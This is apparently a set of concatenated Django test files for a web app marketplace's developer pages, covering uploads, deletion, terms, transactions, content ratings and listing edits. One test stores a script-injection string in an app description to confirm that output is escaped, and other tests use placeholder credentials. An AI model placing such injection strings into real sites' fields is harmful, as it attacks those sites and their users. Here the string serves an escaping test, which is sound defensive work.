with self.file(name) as f:
r = self.client.post(reverse('mkt.developers.upload'),
{'upload': f})
eq_(r.status_code, 302)
def file_content(self, name):
with self.file(name) as fp:
return fp.read()
@contextmanager
def file(self, name):
fn = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
'addons', name)
with open(fn, 'rb') as fp:
yield fp
@attr('validator')
def test_detail_json(self):
self.post()
upload = FileUpload.objects.get()
r = self.client.get(reverse('mkt.developers.upload_detail',
args=[upload.uuid, 'json']))
eq_(r.status_code, 200)
data = json.loads(r.content)
assert_no_validation_errors(data)
eq_(data['url'],
reverse('mkt.developers.upload_detail', args=[upload.uuid,
'json']))
eq_(data['full_report_url'],
reverse('mkt.developers.upload_detail', args=[upload.uuid]))
# We must have tiers
assert len(data['validation']['messages'])
msg = data['validation']['messages'][0]
eq_(msg['tier'], 1)
@mock.patch('mkt.developers.tasks.requests.get')
@mock.patch('mkt.developers.tasks.run_validator')
def test_detail_for_free_extension_webapp(self, validator_mock,
requests_mock):
content = self.file_content('mozball.owa')
response_mock = mock.Mock(status_code=200)
response_mock.iter_content.return_value = mock.Mock(
next=lambda: content)
response_mock.headers = {'content-type': self.content_type}
yield response_mock
requests_mock.return_value = response_mock
validator_mock.return_value = json.dumps(self.validation_ok())
self.upload_file('mozball.owa')
upload = FileUpload.objects.get()
tasks.fetch_manifest('http://xx.com/manifest.owa', upload.pk)
r = self.client.get(reverse('mkt.developers.upload_detail',
args=[upload.uuid, 'json']))
data = json.loads(r.content)
eq_(data['validation']['messages'], []) # no errors
assert_no_validation_errors(data) # no exception
eq_(r.status_code, 200)
eq_(data['url'],
reverse('mkt.developers.upload_detail', args=[upload.uuid,
'json']))
eq_(data['full_report_url'],
reverse('mkt.developers.upload_detail', args=[upload.uuid]))
def test_detail_view(self):
self.post()
upload = FileUpload.objects.get(name='animated.png')
r = self.client.get(reverse('mkt.developers.upload_detail',
args=[upload.uuid]))
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('header h1').text(), 'Validation Results for animated.png')
suite = doc('#addon-validator-suite')
eq_(suite.attr('data-validateurl'),
reverse('mkt.developers.standalone_upload_detail',
args=['hosted', upload.uuid]))
eq_(suite('#suite-results-tier-2').length, 1)
def assert_json_error(request, field, msg):
eq_(request.status_code, 400)
eq_(request['Content-Type'], 'application/json')
field = '__all__' if field is None else field
content = json.loads(request.content)
assert field in content, '%r not in %r' % (field, content)
eq_(content[field], [msg])
def assert_json_field(request, field, msg):
eq_(request.status_code, 200)
eq_(request['Content-Type'], 'application/json')
content = json.loads(request.content)
assert field in content, '%r not in %r' % (field, content)
eq_(content[field], msg)
class TestDeleteApp(amo.tests.TestCase):
fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(id=337141)
self.url = self.webapp.get_dev_url('delete')
self.versions_url = self.webapp.get_dev_url('versions')
self.dev_url = reverse('mkt.developers.apps')
self.client.login(username='[email protected]', password='password')
def test_delete_get(self):
eq_(self.client.get(self.url).status_code, 405)
def test_delete_nonincomplete(self):
r = self.client.post(self.url)
self.assertRedirects(r, self.dev_url)
eq_(Addon.objects.count(), 0, 'App should have been deleted.')
def test_delete_incomplete(self):
self.webapp.update(status=amo.STATUS_NULL)
r = self.client.post(self.url)
self.assertRedirects(r, self.dev_url)
eq_(Addon.objects.count(), 0, 'App should have been deleted.')
def test_delete_incomplete_manually(self):
webapp = amo.tests.addon_factory(type=amo.ADDON_WEBAPP, name='Boop',
status=amo.STATUS_NULL)
eq_(list(Webapp.objects.filter(id=webapp.id)), [webapp])
webapp.delete('POOF!')
eq_(list(Webapp.objects.filter(id=webapp.id)), [],
'App should have been deleted.')
def check_delete_redirect(self, src, dst):
r = self.client.post(urlparams(self.url, to=src))
self.assertRedirects(r, dst)
eq_(Addon.objects.count(), 0, 'App should have been deleted.')
def test_delete_redirect_to_dashboard(self):
self.check_delete_redirect(self.dev_url, self.dev_url)
def test_delete_redirect_to_dashboard_with_qs(self):
url = self.dev_url + '?sort=created'
self.check_delete_redirect(url, url)
def test_form_action_on_status_page(self):
# If we started on app's Manage Status page, upon deletion we should
# be redirecte to the Dashboard.
r = self.client.get(self.versions_url)
eq_(pq(r.content)('.modal-delete form').attr('action'), self.url)
self.check_delete_redirect('', self.dev_url)
class TestEnableDisable(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
self.webapp = Webapp.objects.get(id=337141)
self.enable_url = self.webapp.get_dev_url('enable')
self.disable_url = self.webapp.get_dev_url('disable')
assert self.client.login(username='[email protected]',
password='password')
def test_get(self):
eq_(self.client.get(self.enable_url).status_code, 405)
eq_(self.client.get(self.disable_url).status_code, 405)
def test_not_allowed(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.enable_url))
self.assertLoginRequired(self.client.get(self.disable_url))
def test_enable(self):
self.webapp.update(disabled_by_user=True)
self.client.post(self.enable_url)
eq_(self.webapp.reload().disabled_by_user, False)
def test_disable(self):
self.client.post(self.disable_url)
eq_(self.webapp.reload().disabled_by_user, True)
class TestRemoveLocale(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
self.webapp = Addon.objects.no_cache().get(id=337141)
self.url = self.webapp.get_dev_url('remove-locale')
assert self.client.login(username='[email protected]',
password='password')
def test_bad_request(self):
r = self.client.post(self.url)
eq_(r.status_code, 400)
def test_success(self):
self.webapp.name = {'en-US': 'woo', 'es': 'ay', 'el': 'yeah'}
self.webapp.save()
self.webapp.remove_locale('el')
r = self.client.post(self.url, {'locale': 'el'})
eq_(r.status_code, 200)
qs = list(Translation.objects.filter(localized_string__isnull=False)
.values_list('locale', flat=True)
.filter(id=self.webapp.name_id))
eq_(qs, ['en-US', 'es'])
def test_delete_default_locale(self):
r = self.client.post(self.url, {'locale': self.webapp.default_locale})
eq_(r.status_code, 400)
class TestTerms(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.user = self.get_user()
self.client.login(username=self.user.email, password='password')
self.url = reverse('mkt.developers.apps.terms')
def get_user(self):
return UserProfile.objects.get(email='[email protected]')
def test_login_required(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_accepted(self):
self.user.update(read_dev_agreement=datetime.datetime.now())
res = self.client.get(self.url)
doc = pq(res.content)
eq_(doc('#dev-agreement').length, 1)
eq_(doc('#agreement-form').length, 0)
def test_not_accepted(self):
self.user.update(read_dev_agreement=None)
res = self.client.get(self.url)
doc = pq(res.content)
eq_(doc('#dev-agreement').length, 1)
eq_(doc('#agreement-form').length, 1)
def test_accept(self):
self.user.update(read_dev_agreement=None)
res = self.client.post(self.url, {'read_dev_agreement': 'yeah'})
eq_(res.status_code, 200)
assert self.get_user().read_dev_agreement
@mock.patch.object(settings, 'DEV_AGREEMENT_LAST_UPDATED',
amo.tests.days_ago(-5).date())
def test_update(self):
past = self.days_ago(10)
self.user.update(read_dev_agreement=past)
res = self.client.post(self.url, {'read_dev_agreement': 'yeah'})
eq_(res.status_code, 200)
assert self.get_user().read_dev_agreement != past
@mock.patch.object(settings, 'DEV_AGREEMENT_LAST_UPDATED',
amo.tests.days_ago(-5).date())
def test_past(self):
past = self.days_ago(10)
self.user.update(read_dev_agreement=past)
res = self.client.get(self.url)
doc = pq(res.content)
eq_(doc('#site-notice').length, 1)
eq_(doc('#dev-agreement').length, 1)
eq_(doc('#agreement-form').length, 1)
def test_not_past(self):
res = self.client.get(self.url)
doc = pq(res.content)
eq_(doc('#site-notice').length, 0)
eq_(doc('#dev-agreement').length, 1)
eq_(doc('#agreement-form').length, 0)
def test_l10n_good(self):
for locale in ('en-US', 'es', 'pl'):
res = self.client.get(self.url, {'lang': locale})
eq_(res.status_code, 200)
self.assertTemplateUsed(res, 'dev-agreement/%s.html' % locale)
def test_l10n_fallback(self):
res = self.client.get(self.url, {'lang': 'swag'})
eq_(res.status_code, 200)
self.assertTemplateUsed(res, 'dev-agreement/en-US.html')
def test_redirect_to_relative(self):
api_url = reverse('mkt.developers.apps.api')
res = self.client.post(urlparams(self.url, to=api_url),
{'read_dev_agreement': 'yeah'})
self.assert3xx(res, api_url)
def test_redirect_to_external(self):
res = self.client.post(urlparams(self.url, to='https://hy.fr'),
{'read_dev_agreement': 'yeah'})
eq_(res.status_code, 200)
class TestTransactionList(amo.tests.TestCase):
fixtures = fixture('user_999')
def setUp(self):
"""Create and set up apps for some filtering fun."""
self.create_switch(name='view-transactions')
self.url = reverse('mkt.developers.transactions')
self.client.login(username='[email protected]', password='password')
self.apps = [app_factory(), app_factory()]
self.user = UserProfile.objects.get(id=999)
for app in self.apps:
AddonUser.objects.create(addon=app, user=self.user)
# Set up transactions.
tx0 = Contribution.objects.create(addon=self.apps[0],
type=amo.CONTRIB_PURCHASE,
user=self.user,
uuid=12345)
tx1 = Contribution.objects.create(addon=self.apps[1],
type=amo.CONTRIB_REFUND,
user=self.user,
uuid=67890)
tx0.update(created=datetime.date(2011, 12, 25))
tx1.update(created=datetime.date(2012, 1, 1))
self.txs = [tx0, tx1]
def test_200(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
def test_own_apps(self):
"""Only user's transactions are shown."""
app_factory()
r = RequestFactory().get(self.url)
r.user = self.user
transactions = _get_transactions(r)[1]
self.assertSetEqual([tx.addon for tx in transactions], self.apps)
def test_filter(self):
"""For each field in the form, run it through view and check results.
"""
tx0 = self.txs[0]
tx1 = self.txs[1]
self.do_filter(self.txs)
self.do_filter(self.txs, transaction_type='None', app='oshawott')
self.do_filter([tx0], app=tx0.addon.id)
self.do_filter([tx1], app=tx1.addon.id)
self.do_filter([tx0], transaction_type=tx0.type)
self.do_filter([tx1], transaction_type=tx1.type)
self.do_filter([tx0], transaction_id=tx0.uuid)
self.do_filter([tx1], transaction_id=tx1.uuid)
self.do_filter(self.txs, date_from=datetime.date(2011, 12, 1))
self.do_filter([tx1], date_from=datetime.date(2011, 12, 30),
date_to=datetime.date(2012, 2, 1))
def do_filter(self, expected_txs, **kw):
"""Checks that filter returns the expected ids
expected_ids -- list of app ids expected in the result.
"""
qs = _filter_transactions(Contribution.objects.all(), kw)
self.assertSetEqual(qs.values_list('id', flat=True),
[tx.id for tx in expected_txs])
class TestContentRatings(amo.tests.TestCase):
fixtures = fixture('user_admin', 'user_admin_group', 'group_admin')
def setUp(self):
self.create_switch('iarc')
self.app = app_factory()
self.app.latest_version.update(
_developer_name='Lex Luthor <[email protected]>')
self.user = UserProfile.objects.get()
self.url = reverse('mkt.developers.apps.ratings',
args=[self.app.app_slug])
self.req = amo.tests.req_factory_factory(self.url, user=self.user)
self.req.session = mock.MagicMock()
@override_settings(IARC_SUBMISSION_ENDPOINT='https://yo.lo',
IARC_STOREFRONT_ID=1, IARC_PLATFORM='Firefox',
IARC_PASSWORD='s3kr3t')
def test_edit(self):
r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
doc = pq(r.content)
# Check the form action.
form = doc('#ratings-edit form')[0]
eq_(form.action, 'https://yo.lo')
# Check the hidden form values.
values = dict(form.form_values())
eq_(values['storefront'], '1')
# Note: The HTML is actually double escaped but pyquery shows it how it
# will be send to IARC, which is singly escaped.
eq_(values['company'], 'Lex Luthor <[email protected]>')
eq_(values['email'], self.user.email)
eq_(values['appname'], get_iarc_app_title(self.app))
eq_(values['platform'], 'Firefox')
eq_(values['token'], self.app.iarc_token())
eq_(values['pingbackurl'],
absolutify(reverse('content-ratings-pingback',
args=[self.app.app_slug])))
def test_edit_default_locale(self):
"""Ensures the form uses the app's default locale."""
self.app.name = {'es': u'Español', 'en-US': 'English'}
self.app.default_locale = 'es'
self.app.save()
r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
doc = pq(r.content.decode('utf-8'))
eq_(u'Español' in
dict(doc('#ratings-edit form')[0].form_values())['appname'],
True)
self.app.update(default_locale='en-US')
r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
doc = pq(r.content.decode('utf-8'))
eq_(u'English' in
dict(doc('#ratings-edit form')[0].form_values())['appname'],
True)
def test_summary(self):
rbs = mkt.ratingsbodies
ratings = [rbs.CLASSIND_L, rbs.GENERIC_3, rbs.USK_18, rbs.ESRB_M,
rbs.PEGI_12]
for rating in ratings:
ContentRating.objects.create(
addon=self.app, ratings_body=rating.ratingsbody.id,
rating=rating.id)
r = content_ratings(self.req, app_slug=self.app.app_slug)
doc = pq(r.content)
for i, name in enumerate(doc('.name')):
eq_(name.text, ratings[i].ratingsbody.name)
def test_edit_iarc_app_form(self):
r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
doc = pq(r.content)
assert not doc('#id_submission_id').attr('value')
assert not doc('#id_security_code').attr('value')
self.app.set_iarc_info(1234, 'abcd')
r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
doc = pq(r.content)
eq_(doc('#id_submission_id').attr('value'), '1234')
eq_(doc('#id_security_code').attr('value'), 'abcd')
class TestContentRatingsSuccessMsg(amo.tests.TestCase):
def setUp(self):
self.app = app_factory(status=amo.STATUS_NULL)
def _make_complete(self, complete_errs):
complete_errs.return_value = {}
def _rate_app(self):
self.app.content_ratings.create(ratings_body=0, rating=0)
def test_create_rating_still_incomplete(self):
self._rate_app()
eq_(_ratings_success_msg(self.app, amo.STATUS_NULL, None),
_submission_msgs()['content_ratings_saved'])
@mock.patch('mkt.webapps.models.Webapp.completion_errors')
def test_create_rating_now_complete(self, complete_errs):
self._rate_app()
self.app.update(status=amo.STATUS_PENDING)
eq_(_ratings_success_msg(self.app, amo.STATUS_NULL, None),
_submission_msgs()['complete'])
@mock.patch('mkt.webapps.models.Webapp.completion_errors')
def test_create_rating_public_app(self, complete_errs):
self._rate_app()
self.app.update(status=amo.STATUS_PUBLIC)
eq_(_ratings_success_msg(self.app, amo.STATUS_PUBLIC, None),
_submission_msgs()['content_ratings_saved'])
@mock.patch('mkt.webapps.models.Webapp.completion_errors')
def test_update_rating_still_complete(self, complete_errs):
self._rate_app()
self.app.update(status=amo.STATUS_PENDING)
eq_(_ratings_success_msg(self.app, amo.STATUS_PENDING,
self.days_ago(5).isoformat()),
_submission_msgs()['content_ratings_saved'])
########NEW FILE########
__FILENAME__ = test_views_api
# -*- coding: utf-8 -*-
import json
from django.core.urlresolvers import NoReverseMatch
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
import mock
from nose.tools import eq_
import amo.tests
import mkt
from amo.utils import urlparams
from mkt.api.models import Access
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import ContentRating, Geodata
from users.models import UserProfile
class TestAPI(amo.tests.TestCase):
fixtures = fixture('user_999')
def setUp(self):
self.profile = UserProfile.objects.get(pk=999)
self.user = self.profile
self.login(self.profile)
self.url = reverse('mkt.developers.apps.api')
def test_logged_out(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_non_url(self):
res = self.client.post(
self.url,
{'app_name': 'test', 'redirect_uri': 'mailto:[email protected]'})
self.assertFormError(res, 'form', 'redirect_uri',
['Enter a valid URL.'])
def test_create(self):
Access.objects.create(user=self.user, key='foo', secret='bar')
res = self.client.post(
self.url,
{'app_name': 'test', 'redirect_uri': 'https://example.com/myapp'})
self.assertNoFormErrors(res)
eq_(res.status_code, 200)
consumers = Access.objects.filter(user=self.user)
eq_(len(consumers), 2)
eq_(consumers[1].key, 'mkt:999:[email protected]:1')
def test_delete(self):
a = Access.objects.create(user=self.user, key='foo', secret='bar')
res = self.client.post(self.url, {'delete': 'yep', 'consumer': a.pk})
eq_(res.status_code, 200)
eq_(Access.objects.filter(user=self.user).count(), 0)
def test_admin(self):
self.grant_permission(self.profile, 'What:ever', name='Admins')
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(Access.objects.filter(user=self.user).count(), 0)
def test_other(self):
self.grant_permission(self.profile, 'What:ever')
res = self.client.post(
self.url,
{'app_name': 'test', 'redirect_uri': 'http://example.com/myapp'})
eq_(res.status_code, 200)
eq_(Access.objects.filter(user=self.user).count(), 1)
class TestContentRating(amo.tests.TestCase):
def setUp(self):
self.app = amo.tests.app_factory()
def test_get_content_ratings(self):
for body in (mkt.ratingsbodies.CLASSIND, mkt.ratingsbodies.ESRB):
ContentRating.objects.create(addon=self.app, ratings_body=body.id,
rating=0)
res = self.client.get(reverse('content-ratings-list',
args=[self.app.app_slug]))
eq_(res.status_code, 200)
res = json.loads(res.content)
eq_(len(res['objects']), 2)
rating = res['objects'][0]
eq_(rating['body'], 'classind')
eq_(rating['rating'], '0')
def test_get_content_ratings_since(self):
cr = ContentRating.objects.create(addon=self.app, ratings_body=0,
rating=0)
cr.update(modified=self.days_ago(100))
res = self.client.get(urlparams(
reverse('content-ratings-list', args=[self.app.app_slug]),
since=self.days_ago(5)))
eq_(res.status_code, 404)
cr.update(modified=self.days_ago(1))
res = self.client.get(urlparams(
reverse('content-ratings-list', args=[self.app.id]),
since=self.days_ago(5)))
eq_(res.status_code, 200)
eq_(len(json.loads(res.content)['objects']), 1)
def test_view_whitelist(self):
"""Only -list, no create/update/delete."""
with self.assertRaises(NoReverseMatch):
reverse('content-ratings-create', args=[self.app.id])
with self.assertRaises(NoReverseMatch):
reverse('content-ratings-update', args=[self.app.id])
with self.assertRaises(NoReverseMatch):
reverse('content-ratings-delete', args=[self.app.id])
reverse('content-ratings-list', args=[self.app.app_slug])
@override_settings(SECRET_KEY='test')
class TestContentRatingPingback(RestOAuth):
def setUp(self):
super(TestContentRatingPingback, self).setUp()
self.app = amo.tests.app_factory(status=amo.STATUS_NULL)
self.url = reverse('content-ratings-pingback', args=[self.app.pk])
self.data = {
'ROW': {
'FIELD': [
{
'TYPE': 'int',
'NAME': 'rowId',
'VALUE': '1'
},
{
'TYPE': 'string',
'NAME': 'token',
'VALUE': self.app.iarc_token()
},
{
'TYPE': 'int',
'NAME': 'submission_id',
'VALUE': '52'
},
{
'TYPE': 'string',
'NAME': 'security_code',
'VALUE': 'AB12CD3'
},
{
'TYPE': 'string',
'NAME': 'title',
'VALUE': 'Twitter'
},
{
'TYPE': 'string',
'NAME': 'company',
'VALUE': 'Mozilla'
},
{
'TYPE': 'string',
'NAME': 'platform',
'VALUE': 'Firefox'
},
{
'TYPE': 'string',
'NAME': 'rating_PEGI',
'VALUE': '16+'
},
{
'TYPE': 'string',
'NAME': 'descriptors_PEGI',
'VALUE': 'Language,Online'
},
{
'TYPE': 'string',
'NAME': 'rating_USK',
'VALUE': 'Rating Refused'
},
{
'TYPE': 'string',
'NAME': 'descriptors_USK',
'VALUE': u'Explizite Sprache'
},
{
'TYPE': 'string',
'NAME': 'rating_ESRB',
'VALUE': 'Mature 17+'
},
{
'TYPE': 'string',
'NAME': 'descriptors_ESRB',
'VALUE': 'Strong Language'
},
{
'TYPE': 'string',
'NAME': 'rating_CLASSIND',
'VALUE': '14+'
},
{
'TYPE': 'string',
'NAME': 'descriptors_CLASSIND',
'VALUE': u'Linguagem Impr\xF3pria,Cont\xE9udo Sexual'
},
{
'TYPE': 'string',
'NAME': 'rating_Generic',
'VALUE': '16+'
},
{
'TYPE': 'string',
'NAME': 'descriptors_Generic',
'VALUE': ''
},
{
'TYPE': 'string',
'NAME': 'storefront',
'VALUE': 'Mozilla'
},
{
'TYPE': 'string',
'NAME': 'interactive_elements',
'VALUE': 'Shares Info,Shares Location,Digital Purchases,Users Interact'
}
]
}
}
def test_slug_url(self):
url = reverse('content-ratings-pingback', args=[self.app.app_slug])
res = self.anon.post(url, data=json.dumps(self.data))
eq_(res.status_code, 200)
def test_invalid_content_type(self):
res = self.anon.post(self.url, data=json.dumps(self.data),
content_type='application/xml')
eq_(res.status_code, 415)
res = self.anon.post(self.url, data=json.dumps(self.data),
content_type='application/x-www-form-urlencoded')
eq_(res.status_code, 415)
@mock.patch('mkt.webapps.models.Webapp.details_complete')
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_post_content_ratings_pingback(self, details_mock,
storefront_mock):
details_mock.return_value = True
eq_(self.app.status, amo.STATUS_NULL)
res = self.anon.post(self.url, data=json.dumps(self.data))
eq_(res.status_code, 200)
# Verify things were saved to the database.
app = self.app.reload()
# IARC info.
eq_(app.iarc_info.submission_id, 52)
eq_(app.iarc_info.security_code, 'AB12CD3')
assert storefront_mock.called
# Ratings.
eq_(app.content_ratings.count(), 5)
for rb, rating in [
(mkt.ratingsbodies.CLASSIND, mkt.ratingsbodies.CLASSIND_14),
(mkt.ratingsbodies.ESRB, mkt.ratingsbodies.ESRB_M),
(mkt.ratingsbodies.GENERIC, mkt.ratingsbodies.GENERIC_16),
(mkt.ratingsbodies.PEGI, mkt.ratingsbodies.PEGI_16),
(mkt.ratingsbodies.USK, mkt.ratingsbodies.USK_REJECTED)]:
eq_(app.content_ratings.get(ratings_body=rb.id).rating, rating.id,
'Unexpected rating for rating body %s.' % rb)
# Descriptors.
self.assertSetEqual(
app.rating_descriptors.to_keys(),
['has_classind_lang', 'has_classind_sex_content',
'has_pegi_lang', 'has_pegi_online',
'has_esrb_strong_lang',
'has_usk_lang'])
# Interactives.
self.assertSetEqual(
app.rating_interactives.to_keys(),
['has_shares_info', 'has_shares_location',
'has_digital_purchases', 'has_users_interact'])
eq_(app.status, amo.STATUS_PENDING)
assert app.current_version.nomination
@override_settings(SECRET_KEY='foo')
def test_token_mismatch(self):
res = self.anon.post(self.url, data=json.dumps(self.data))
eq_(res.status_code, 400)
eq_(json.loads(res.content)['detail'], 'Token mismatch')
@mock.patch('mkt.webapps.models.Webapp.details_complete')
def test_post_content_ratings_pingback_iarc_exclude(self, details_mock):
details_mock.return_value = True
self.app._geodata.update(region_br_iarc_exclude=True,
region_de_iarc_exclude=True)
self.anon.post(self.url, data=json.dumps(self.data))
# Verify things were saved to the database.
geodata = Geodata.objects.get(addon=self.app)
assert not geodata.region_br_iarc_exclude
assert not geodata.region_de_iarc_exclude
@mock.patch('mkt.developers.views.ContentRatingsPingback.verify_data')
@mock.patch('mkt.webapps.models.Webapp.details_complete',
new=mock.Mock())
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data',
new=mock.Mock())
def test_verify_data(self, verify_mock):
verify_mock.return_value = False
res = self.anon.post(self.url, data=json.dumps(self.data))
eq_(res.status_code, 400)
########NEW FILE########
__FILENAME__ = test_views_edit
# -*- coding: utf-8 -*-
import json
import os
import tempfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode
import mock
from nose import SkipTest
from nose.tools import eq_, ok_
from PIL import Image
from pyquery import PyQuery as pq
from tower import strip_whitespace
from waffle.models import Switch
import amo
import amo.tests
import mkt
from access.models import Group, GroupUser
from addons.models import (Addon, AddonCategory, AddonDeviceType, AddonUser,
Category)
from amo.helpers import absolutify
from amo.tests import assert_required, formset, initial
from amo.tests.test_helpers import get_image_path
from devhub.models import ActivityLog
from editors.models import RereviewQueue
from lib.video.tests import files as video_files
from mkt.comm.models import CommunicationNote
from mkt.constants import regions
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion as AER
from translations.models import Translation
from users.models import UserProfile
from versions.models import Version
response_mock = mock.Mock()
response_mock.read.return_value = '''
{
"name": "Something Ballin!",
"description": "Goin' hard in the paint.",
"launch_path": "/ballin/4.eva",
"developer": {
"name": "Pro Balliner",
"url": "http://www.ballin4eva.xxx"
},
"icons": {
"128": "/ballin/icon.png"
},
"installs_allowed_from": [ "https://marketplace.firefox.com" ]
}
'''
response_mock.headers = {'Content-Type':
'application/x-web-app-manifest+json'}
def get_section_url(addon, section, edit=False):
args = [addon.app_slug, section]
if edit:
args.append('edit')
return reverse('mkt.developers.apps.section', args=args)
class TestEdit(amo.tests.TestCase):
fixtures = fixture('group_admin', 'user_999', 'user_admin',
'user_admin_group', 'webapp_337141')
def setUp(self):
self.webapp = self.get_webapp()
self.url = self.webapp.get_dev_url()
self.user = UserProfile.objects.get(username='31337')
assert self.client.login(username=self.user.email, password='password')
def get_webapp(self):
return Addon.objects.no_cache().get(id=337141)
def get_url(self, section, edit=False):
return get_section_url(self.webapp, section, edit)
def get_dict(self, **kw):
fs = formset(self.cat_initial, initial_count=1)
result = {'name': 'new name', 'slug': 'test_slug',
'description': 'new description'}
result.update(**kw)
result.update(fs)
return result
def compare(self, data):
"""Compare an app against a `dict` of expected values."""
mapping = {
'regions': 'get_region_ids'
}
webapp = self.get_webapp()
for k, v in data.iteritems():
k = mapping.get(k, k)
val = getattr(webapp, k, '')
if callable(val):
val = val()
if val is None:
val = ''
eq_(unicode(val), unicode(v))
def compare_features(self, data, version=None):
"""
Compare an app's set of required features against a `dict` of expected
values.
"""
if not version:
version = self.get_webapp().current_version
features = version.features
for k, v in data.iteritems():
val = getattr(features, k)
if callable(val):
val = val()
eq_(unicode(val), unicode(v))
def check_form_url(self, section):
# Check form destinations and "Edit" button.
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('form').attr('action'), self.edit_url)
eq_(doc('h2 .button').attr('data-editurl'), self.edit_url)
# Check "Cancel" button.
r = self.client.get(self.edit_url)
eq_(pq(r.content)('form .addon-edit-cancel').attr('href'), self.url)
class TestEditListingWebapp(TestEdit):
fixtures = fixture('webapp_337141')
@mock.patch.object(settings, 'APP_PREVIEW', False)
def test_apps_context(self):
r = self.client.get(self.url)
eq_(r.context['webapp'], True)
eq_(pq(r.content)('title').text(),
'Edit Listing | %s | Firefox Marketplace' % self.webapp.name)
def test_redirect(self):
r = self.client.get(self.url.replace('edit', ''))
self.assert3xx(r, self.url)
def test_nav_links(self):
r = self.client.get(self.url)
doc = pq(r.content)('.edit-addon-nav')
eq_(doc.length, 2)
eq_(doc('.view-stats').length, 0)
def test_edit_with_no_current_version(self):
# Disable file for latest version, and then update app.current_version.
app = self.get_webapp()
app.versions.latest().all_files[0].update(status=amo.STATUS_DISABLED)
app.update_version()
# Now try to display edit page.
r = self.client.get(self.url)
eq_(r.status_code, 200)
@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestEditBasic(TestEdit):
fixtures = TestEdit.fixtures
def setUp(self):
super(TestEditBasic, self).setUp()
self.cat = Category.objects.create(name='Games', type=amo.ADDON_WEBAPP)
self.dtype = amo.DEVICE_TYPES.keys()[0]
AddonCategory.objects.create(addon=self.webapp, category=self.cat)
AddonDeviceType.objects.create(addon=self.webapp,
device_type=self.dtype)
self.url = self.get_url('basic')
self.edit_url = self.get_url('basic', edit=True)
def get_webapp(self):
return Addon.objects.get(id=337141)
def get_dict(self, **kw):
result = {'device_types': self.dtype, 'slug': 'NeW_SluG',
'description': 'New description with <em>html</em>!',
'manifest_url': self.webapp.manifest_url,
'categories': [self.cat.id]}
result.update(**kw)
return result
def test_form_url(self):
self.check_form_url('basic')
def test_apps_context(self):
eq_(self.client.get(self.url).context['webapp'], True)
def test_appslug_visible(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(pq(r.content)('#slug_edit').remove('a, em').text(),
absolutify(u'/\u2026/%s' % self.webapp.app_slug))
def test_edit_slug_success(self):
data = self.get_dict()
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
eq_(r.status_code, 200)
webapp = self.get_webapp()
eq_(webapp.app_slug, data['slug'].lower())
# Make sure only the app_slug changed.
eq_(webapp.slug, self.webapp.slug)
def test_edit_slug_max_length(self):
r = self.client.post(self.edit_url, self.get_dict(slug='x' * 31))
self.assertFormError(r, 'form', 'slug',
'Ensure this value has at most 30 characters (it has 31).')
def test_edit_slug_dupe(self):
Addon.objects.create(type=amo.ADDON_WEBAPP, app_slug='dupe')
r = self.client.post(self.edit_url, self.get_dict(slug='dupe'))
self.assertFormError(r, 'form', 'slug',
'This slug is already in use. Please choose another.')
webapp = self.get_webapp()
# Nothing changed.
eq_(webapp.slug, self.webapp.slug)
eq_(webapp.app_slug, self.webapp.app_slug)
def test_edit_xss(self):
self.webapp.description = ("This\n<b>IS</b>"
"<script>alert('awesome')</script>")
self.webapp.save()
r = self.client.get(self.url)
eq_(pq(r.content)('#addon-description span[lang]').html(),
"This<br/><b>IS</b><script>alert('awesome')"
'</script>')
def test_view_manifest_url_default(self):
# Should be able to see manifest URL listed.
r = self.client.get(self.url)
eq_(pq(r.content)('#manifest-url a').attr('href'),
self.webapp.manifest_url)
# There should be a readonly text field.
r = self.client.get(self.edit_url)
row = pq(r.content)('#manifest-url')
eq_(row.find('input[name=manifest_url][readonly]').length, 1)
# POST with the new manifest URL.
url = 'https://ballin.com/ballin4eva'
r = self.client.post(self.edit_url, self.get_dict(manifest_url=url))
self.assertNoFormErrors(r)
# The manifest should remain unchanged since this is disabled for
# non-admins.
eq_(self.get_webapp().manifest_url, self.webapp.manifest_url)
def test_view_edit_manifest_url_empty(self):
# Empty manifest should throw an error.
r = self.client.post(self.edit_url, self.get_dict(manifest_url=''))
form = r.context['form']
assert 'manifest_url' in form.errors
assert 'This field is required' in form.errors['manifest_url'][0]
def test_view_admin_edit_manifest_url(self):
self.client.login(username='[email protected]', password='password')
# Should be able to see manifest URL listed.
r = self.client.get(self.url)
eq_(pq(r.content)('#manifest-url a').attr('href'),
self.webapp.manifest_url)
# Admins can edit the manifest URL and should see a text field.
r = self.client.get(self.edit_url)
row = pq(r.content)('#manifest-url')
eq_(row.find('input[name=manifest_url]').length, 1)
eq_(row.find('input[name=manifest_url][readonly]').length, 0)
# POST with the new manifest URL.
url = 'https://ballin.com/ballin4eva.webapp'
r = self.client.post(self.edit_url, self.get_dict(manifest_url=url))
self.assertNoFormErrors(r)
self.webapp = self.get_webapp()
eq_(self.webapp.manifest_url, url)
eq_(self.webapp.app_domain, 'https://ballin.com')
eq_(self.webapp.current_version.version, '1.0')
eq_(self.webapp.versions.count(), 1)
